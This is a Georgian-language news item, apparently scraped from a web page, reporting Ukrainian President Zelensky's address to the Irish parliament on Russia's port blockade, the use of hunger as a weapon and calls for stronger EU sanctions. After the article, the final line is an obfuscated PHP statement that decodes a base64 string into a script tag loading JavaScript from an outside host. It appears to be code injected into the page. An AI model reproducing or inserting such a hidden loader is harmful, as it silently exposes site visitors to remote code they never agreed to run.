celsiusi
ავერსი საქკაბელი
ირლანდიის პარლამენტის წევრებისადმი მიმართვისას უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ განაცხადა, რომ რუსეთს ბლოკირებული აქვს უკრაინული პორტები და გემები ექსპორტისთვის განკუთვნილი სურსათით.
 
ზელენსკის თქმით, რუსეთი განგებ ქმნის სასურსათო კრიზისს, რომ შიმშილი იარაღად გამოიყენოს. 
 
„მათთვის შიმშილი არის იარაღი ჩვენს წინააღმდეგ, რიგითი ადამიანების წინააღმდეგ, ეს არის დომინირების ინსტრუმენტი. ამ ღამით ჩვენს ტერიტორიაზე კვლავ განხორციელდა რუსეთის მხრიდან სარაკეტო დარტყმები, დაიბომბა სამოქალაქო ინფრასტრუქტურა, განხორციელდა დარტყმა ახალი ნავთობტერმინალზე, რუსეთი ამას სამიზნედ განიხილავს. ისინი ანადგურებენ ყველაფერს, რაც ხალხისთვის საარსებო წყაროს წარმოადგენს. ისინი დარტყმებს ახორციელებენ იმ ადგილებში, სადაც ჩვენ ვინახავთ საწვავს, სურსათს, სოფლის მეურნეობის აღჭურვილობას, სახნავ-სათესებს. ისინი მინდვრებს ნაღმავენ. რატომ აკეთებენ ამას? რადგან მათთვის შიმშილი ასევე იარაღია, იარაღი რიგითი ადამიანების წინააღმდეგ, ეს არის დომინირების ინსტრუმენტი. უკრაინა სურსათის მიმწოდებელი ერთ-ერთი წამყვანი ქვეყანაა მსოფლიოში. ჩვენი ექსპორტის გარეშე არის სურსათის დეფიციტი და შიმშილის საფრთხე. შიმშილის საფრთხე აზიისა და აფრიკის ათობით ქვეყნისთვის, შეიქმნება სურსათის დეფიციტი და გაიზრდება ფასები. ეს არის რეალობა მილიონობით მშიერი ადამიანისთვის“, – განაცხადა ზელენსკიმ.
 
უკრაინის პრეზიდენტმა მოუწოდა ირლანდიის ხელისუფლებას დაარწმუნოს ევროკავშირის ქვეყნები, რომ მათ უფრო მკაცრი სანქციები დააწესონ პუტინის ინტერვენციის შესაჩერებლად.
673
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");